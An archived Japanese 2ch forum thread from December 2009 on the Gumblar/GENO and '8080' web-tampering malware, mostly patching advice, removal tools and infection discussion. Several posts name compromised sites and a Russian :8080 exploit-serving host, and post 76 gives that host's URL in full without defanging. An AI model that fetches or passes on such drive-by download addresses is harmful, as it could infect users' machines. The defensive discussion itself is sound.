【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2009/12/27(日) 04:20:21ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0002名無しさん@お腹いっぱい。
2009/12/27(日) 04:21:08下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0003名無しさん@お腹いっぱい。
2009/12/27(日) 04:21:48■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
0004名無しさん@お腹いっぱい。
2009/12/27(日) 04:23:10■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
0005名無しさん@お腹いっぱい。
2009/12/27(日) 04:24:11Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
0006名無しさん@お腹いっぱい。
2009/12/27(日) 04:25:02Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと!
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
・Microsoft Updateは確実に適用しましょう (*「カスタム」選択更新で適用にエラーが無いか?は確認出来ます)
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します
・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン(Webブラウザ拡張機能)の内容は把握しておきましょう
・ソフトウェアやブラウザ(Webプラグイン類も)の最新版Updateとセキュリティ設定を常に心掛けましょう
(*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
(*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する)
・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい (*VirusTotal.comスキャンを活用)
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう (*危険な餌に釣られない用心を持ちましょう)
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう (*IDセーフ機能も活用)
●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了 2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
ttp://internet.watch.impress.co.jp/docs/news/20090724_304366.html
0007名無しさん@お腹いっぱい。
2009/12/27(日) 04:25:21抜け、間違いがあれば指摘よろ
00081
2009/12/27(日) 04:26:140009名無しさん@お腹いっぱい。
2009/12/27(日) 04:26:15・「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
ttp://www.emsisoft.com/en/software/free/
サービス > 「a-squared Free Service」を無効 > 停止 > 適用で「自動Update常駐 a2service.exe」の停止=手動Update
・「a-square MalAware 1.0」 クラウドスキャナ (*クイッククラウドチェック、a-squared Freeとの併用がベストです)
*インストール不要 *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
ttp://www.emsisoft.com/en/software/malaware// (ttp://i46.tinypic.com/2gtnn2x.jpg
)
・「Malwarebytes' Anti-Malware 1.42」 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動Update)
ttp://www.malwarebytes.org/mbam.php (*「Protection」ページの機能はNortonとの共存の為に設定しないで下さい)
・「ReducedPermissions」 (手動Windows Updateやオンラインスキャンはエラーに *導入時には「ブロックの解除」設定を)
・「Spyware Blaster 4.2」 危険サイトの制限、危険ActiveXの実行制限処置 (*手動Update *Flash Killer機能も実用的です)
・「Live OneCare PC セーフティ (オンラインスキャン *駆除も可能 *月1・2回程度のチェックでOK)」
ttp://onecare.live.com/site/ja-jp/default.htm?s_cid=sah
・「a-squared HiJackFree 3.1」 ttp://www.hijackfree.com/en/ (*詳細な自己診断ビューア *日本語インターフェイス)
(*インストール後、歯車アイコンから一度アップデート → その後はオフでOK ttp://i45.tinypic.com/3022nwz.jpg
)
0010名無しさん@お腹いっぱい。
2009/12/27(日) 04:26:56https://submit.symantec.com/antifraud/phish.cgi (記入例 ttp://i38.tinypic.com/k1xhjm.jpg
)
*ワンクリック詐欺や詐欺ソフトのダウンロードを仕向けるURLの報告(*複数の場合はenter moreで報告枠追加できます)
*インターネット中に、奇妙な動作を感じたページや、悪意のある動画やゲーム系サイトの報告もOK
*思わぬサイトへ飛ばされた場合などは、リンク元ボタンを右クリック > プロパティでURL確認
■未対応リスクや疑わしいファイルを検疫経由でSymantecへ送信 (*最大10MB以下?までのサイズ)
タスクトレーのNortonアイコンを右クリック「最近の履歴を表示」 > 「検疫」を選択
検疫に追加 (*明らかに未対応リスクである場合は、「ディスクからファイルを削除」にチェック(=検疫と同時に削除))
検疫後、「詳細」 > 下列にある「処理」 > 「Symantecへ提出」をクリック
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi (記入例 ttp://i36.tinypic.com/bhj8ye.jpg
)
■Nortonが誤検出してしまうファイルの報告 - Symantec Security Response 〔False Positive Submission〕
https://submit.symantec.com/dispute/false_positive/ (記入例 ttp://i38.tinypic.com/2itmwjs.jpg
)
●JVN iPedia -脆弱性対策情報データベース (*使用しているソフトウェアの最新版への更新を心掛けましょう)
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
ttp://jvn.jp/report/index.html
■「ttp://www.virustotal.com/jp/」 (37社のファイルスキャンサービス *圧縮ファイルの状態でもOK)
■「ttp://onlinelinkscan.com」 (4種類のサイト安全性チェックを一度に PhisTank ,AVG ,SiteTruth ,Google Safe Browsing)
■「ttp://www.gred.jp(セキュアブレイン gred)」 (国産サイト安全性チェックサービス … ワンクリ詐欺 ,Web攻撃の有無など)
0011名無しさん@お腹いっぱい。
2009/12/27(日) 04:27:38ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service = さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
個人情報をさらすマルウェア、ポルノゲームのインストールファイルを装って流通している 2009/11/30
ttp://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html
ワンクリック不正請求トラブル、相談事例が半年で1万7794件 2009/12/4
ttp://internet.watch.impress.co.jp/docs/news/20091204_333169.html
Gumblar被害拡大中(3) 予防対策:一般ユーザーの方、サイト管理者の方へ 2009/12/11
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
0012◇テンプレここまで
2009/12/27(日) 04:29:25*** テンプレ終了 ***
0013名無しさん@お腹いっぱい。
2009/12/27(日) 04:30:48>>9-11ってノートンスレのテンプレであって関係ないよな?
0014名無しさん@お腹いっぱい。
2009/12/27(日) 05:23:44ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
セキュアブレインが、「Gumblerウイルス」と類似した新たな攻撃手法を確認 2009/10/23
企業に「gredセキュリティサービス 無償トライアル版」を利用し、自社ウェブサイトの検査を行うよう呼びかけ
ttp://antivirus-news.net/2009/10/gumbler.html
迷惑メールからあなたを守るためのチェックリスト 2009/11/10
tp://japan.zdnet.com/news/sec/story/0,2000056194,20403268,00.htm
0015名無しさん@お腹いっぱい。
2009/12/27(日) 05:24:56ネット上の「有害情報」を規制すべきという回答も約9割に上った
http://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
http://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
http://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
http://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
http://www.computerworld.jp/topics/vs/163829.html
ネット検索は信用できない? ユーザー詐称する広告代理店を処罰 2009/10/28
盗んだ個人情報で4900個ものアカウントを作り、一般ユーザーのふりをして「ここがよかったよ〜」と、
特定のお店やWebサイトの宣伝をしていた。つまり、私達が利用したのは知識検索ではなく広告検索だった
ttp://pc.nikkeibp.co.jp/article/column/20091028/1019904/
ミクシィ、4200人情報"露出"…ゲーム課金不具合 2009/11/04
実際に制作・運営しているのは中国のゲーム会社「リクー・メディア」
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20091104-OYT8T00323.htm
0016名無しさん@お腹いっぱい。
2009/12/27(日) 05:28:46■fantastic_kids_1999
特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。
結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時:2009年 6月 13日 15時 11分)
■intelli2009
プロダクトキーが使えなくなり、有効期間も0日に…詐欺でしょうか?(評価日時:2009年 9月 17日 7時 03分)
■number2009livecn(停止中)
期限切れ (評価日時:2009年 11月 5日 11時 08分)
■uxk1216
落札当初、2年間の有効期限と説明を受けていたが、3ヶ月目で更新期限切れが来てしまいました、
どういう事でしょうか? (評価日時:2009年 10月 25日 22時 24分)
■min9763557(停止中)
購入時は認証できましたが、3ヶ月もせず期限切れになりました。許せません。 (評価日時:2009年 11月 12日 17時 29分)
■yuanchong525
こいつはすぐに期限が切れるものを売りつけてます。詐欺です。
まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時:2009年 9月 13日 22時 49分)
■seven_stars_king2000
Yahoo! JAPAN IDが無効です。
■andriy_shevchenko1976929
Yahoo! JAPAN IDが無効です。
■bottega_choice(停止中)
落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時:2009年 10月 20日 17時 03分)
■wxk1216(停止中)
海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時:2009年 10月 7日 21時 41分)
0017名無しさん@お腹いっぱい。
2009/12/27(日) 05:34:27n /⌒ ⌒\
| | /( >) (<)\
i「|^|^ト、/::::::⌒(__人__)⌒::::\ >>1乙だお!
|: :: ! } | /| | | | | |
ヽ ,イ \ (、`ー―'´, /
0018名無しさん@お腹いっぱい。
2009/12/27(日) 10:39:450019名無しさん@お腹いっぱい。
2009/12/27(日) 10:41:55http://www014.upp.so-net.ne.jp/BANBI/png/top.png
ちなみに地図はこちらです。
http://www.mapion.co.jp/m/34.6591819444444_135.453802777778_9/
0020名無しさん@お腹いっぱい。
2009/12/27(日) 15:40:248080(/*GNU GPL*/ や /*CODE1*/)って
いまのところ検知するのノートンとAVASTだけなの?
他のソフトはスキャンでもスルー?
0021名無しさん@お腹いっぱい。
2009/12/27(日) 15:57:14カスペも検知する。
0022名無しさん@お腹いっぱい。
2009/12/27(日) 16:04:28(/*GNU GPL)踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど
0023名無しさん@お腹いっぱい。
2009/12/27(日) 16:12:490024名無しさん@お腹いっぱい。
2009/12/27(日) 16:19:57定義ファイルの結果だから実際はもう少し検出するだろうけど
日付はindex.htmlのもの
/*GNU GPL*/
24日 結果: 7/41
ttp://www.virustotal.com/jp/analisis/c2c5b1338529ba08848f0f25c4e8119d52e7dfcab3358b55619e38232f8af827-1261897615
26日 結果: 0/41
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261896683
/*CODE1*/
22日 結果: 9/41
ttp://www.virustotal.com/jp/analisis/30bd85a231595bbee6fad3b8fa1b1931d6851c6187ca0f55d61a51b07975d38a-1261896524
0025名無しさん@お腹いっぱい。
2009/12/27(日) 16:45:21一例としてsiszyd32.exeをスタートアップに登録するみたいだ
もっともこれが他のウイルスを呼び込むから
感染してたらどうなっているやら・・・
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
ttp://htlogs.com/what-is-siszyd32-exe-how-to-remove-siszyd32-exe/
0026名無しさん@お腹いっぱい。
2009/12/27(日) 16:47:56ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが
やはり黒でしょうか
0027名無しさん@お腹いっぱい。
2009/12/27(日) 17:14:33avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな?
PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな
002826
2009/12/27(日) 17:32:24そうですか・・・
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
(トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ)
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません
確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが
0029名無しさん@お腹いっぱい。
2009/12/27(日) 17:35:36(8080系のポートはチェック対象外のようでした)
0030名無しさん@お腹いっぱい。
2009/12/27(日) 18:11:36それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず
0031名無しさん@お腹いっぱい。
2009/12/27(日) 18:43:17いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
(偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず)
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして
ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません
IEでJAVAスクオンで踏んだんですが、何故生き残ったのか・・・
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました
0032名無しさん@お腹いっぱい。
2009/12/28(月) 00:17:17ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない
0033名無しさん@お腹いっぱい。
2009/12/28(月) 00:27:56でもAVASTも誤検出騒ぎで落ち着かないよな
どうすりゃいいんだ
0035名無しさん@お腹いっぱい。
2009/12/28(月) 00:42:02ああそうか、スマン読み違えてた
0036名無しさん@お腹いっぱい。
2009/12/28(月) 00:44:32どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく
どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る
0037名無しさん@お腹いっぱい。
2009/12/28(月) 00:45:56いや感染(疑い)後の話よ
どのスキャンでも上がってこないらしいじゃん
0038名無しさん@お腹いっぱい。
2009/12/28(月) 00:50:27設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる
確証はないがほぼ防げるんじゃないだろうか
Outpost、Comodo、Online Armor、PC toolsなど
0039名無しさん@お腹いっぱい。
2009/12/28(月) 00:52:47感染後はどうなるのかと言う情報ある?
0040名無しさん@お腹いっぱい。
2009/12/28(月) 00:54:28そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能!とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし
0041名無しさん@お腹いっぱい。
2009/12/28(月) 00:56:23感染してもすぐに復旧できるようにバックアップを取っておく
0042名無しさん@お腹いっぱい。
2009/12/28(月) 00:57:48ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか
0043名無しさん@お腹いっぱい。
2009/12/28(月) 01:01:23次々にウイルスをダウンロードしては実行するので
感染したが最後、収拾がつかなくなるはず
だからダウンローダーを削除しても他のウイルスに
感染している可能性が高い
ある意味Gumblarよりたちが悪い
ここの下あたりに動作が記載されてる
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
0044名無しさん@お腹いっぱい。
2009/12/28(月) 01:02:38パスワードを変更するのも忘れずに
感染しても今のところweb改竄の被害を受けるだけなのかな
俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな
0045名無しさん@お腹いっぱい。
2009/12/28(月) 01:10:34<script>/*GNU GPL*/・・
デジマガ、アウト。
0046名無しさん@お腹いっぱい。
2009/12/28(月) 01:10:34検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・
>>44
パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしw
8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2104
>ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。
0047名無しさん@お腹いっぱい。
2009/12/28(月) 01:12:08志村ー、URLURL
0048名無しさん@お腹いっぱい。
2009/12/28(月) 01:13:04貼っちまったよ・・。
対策ない奴は、絶対開くなよ。
0049名無しさん@お腹いっぱい。
2009/12/28(月) 01:14:32分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが
0050名無しさん@お腹いっぱい。
2009/12/28(月) 01:15:42最後はこういうウイルスの一般的な動作を述べてるだけじゃないか
005146
2009/12/28(月) 01:17:22まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・
0052名無しさん@お腹いっぱい。
2009/12/28(月) 01:29:27JR東日本のサイト改ざん。『/*GNU GPL*/』の不正なJavaScriptコード
http://blogs.yahoo.co.jp/noooo_spam/59306006.html
コレと一緒っぽいな。
0053名無しさん@お腹いっぱい。
2009/12/28(月) 01:30:41True Imageなどのシステムをバックアップするソフトがない場合
お薦めフリーソフト
Paragon Backup & Recovery 10 Free Edition
http://www.paragon-software.com/home/db-express/index.html
起動メディアを作っておけば起動メディアから復元はもちろんバックアップも出来る
Macrium Reflect FREE Edition
http://www.macrium.com/ReflectFree.asp
EASEUS Todo Backup
http://www.todo-backup.com/
0054名無しさん@お腹いっぱい。
2009/12/28(月) 01:33:13あんまり大きな騒ぎにはならなかったよな
潜伏してるのが多いのか?
0055名無しさん@お腹いっぱい。
2009/12/28(月) 01:38:040056名無しさん@お腹いっぱい。
2009/12/28(月) 01:41:11ちゃんと対応できるならまだしも全然駄目じゃないか
アホすぎ
0057名無しさん@お腹いっぱい。
2009/12/28(月) 01:45:29セーフだろうが。嘘を書くなよ
0058名無しさん@お腹いっぱい。
2009/12/28(月) 01:47:36まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな?
0059名無しさん@お腹いっぱい。
2009/12/28(月) 01:48:31晒すときは>>1をよく読もう
>*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
>>56
そしてその危なっかしいものを有効活用しているところがあるという・・・
ttp://slashdot.jp/security/comments.pl?sid=441912&threshold=1&commentsort=3&mode=thread&pid=1526692#1526854
0060名無しさん@お腹いっぱい。
2009/12/28(月) 01:51:09自己レス
http://digimaga●net/
開くと、JREが起動して、アクセスに行こうとするな。ロシアのサイト。
0061名無しさん@お腹いっぱい。
2009/12/28(月) 01:51:33で、>>57は踏んだのか? どうなった?
0062名無しさん@お腹いっぱい。
2009/12/28(月) 01:56:24ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
やられてるだろ。これ。
0063名無しさん@お腹いっぱい。
2009/12/28(月) 01:58:05adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。
まぁ確実かな。
0064名無しさん@お腹いっぱい。
2009/12/28(月) 01:58:54virustotalではどれも検出しない
0065名無しさん@お腹いっぱい。
2009/12/28(月) 02:00:47普通踏んだら速攻で(この場合はロシアから)何か運んでくるものなの?
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね
0066名無しさん@お腹いっぱい。
2009/12/28(月) 02:03:27_ex-68.exeを実行しようとするのでこの辺でやめといた
0067名無しさん@お腹いっぱい。
2009/12/28(月) 02:05:29いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所
0068名無しさん@お腹いっぱい。
2009/12/28(月) 02:09:32どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな
0069名無しさん@お腹いっぱい。
2009/12/28(月) 02:11:43踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが
0070名無しさん@お腹いっぱい。
2009/12/28(月) 02:12:18「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。
0071名無しさん@お腹いっぱい。
2009/12/28(月) 02:14:43いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな
もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない
0072名無しさん@お腹いっぱい。
2009/12/28(月) 02:16:27セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな
バカでゴメン
0073名無しさん@お腹いっぱい。
2009/12/28(月) 02:20:48テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた
最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ
0074名無しさん@お腹いっぱい。
2009/12/28(月) 02:22:26そっか・・・ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ
0075名無しさん@お腹いっぱい。
2009/12/28(月) 02:27:02他のJSをダウンロードしてる先が、ロシアってことか。
そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。
0076名無しさん@お腹いっぱい。
2009/12/28(月) 02:29:11今Aviraで試したらwebguardが検出した。
URL "http://adsrevenue-net.king.com.newgrounds-com.themobilewindow.ru:8080/pics/win.jpg" のデータにアクセスする際に、
ウイルスまたは不要なプログラム 'EXP/DirektShow.A' [exploit] が検出されました。
0077名無しさん@お腹いっぱい。
2009/12/28(月) 02:30:01直リンしちまったじゃねえか
>>76
はウイルス
注意
0078名無しさん@お腹いっぱい。
2009/12/28(月) 02:37:55http://www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261910241
http://www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261933023
http://anubis.iseclab.org/?action=result&task_id=1596ebc77b0f8b50455c2be30bccc5450&format=html
同じURLから27日午前9時頃拾ったやつ
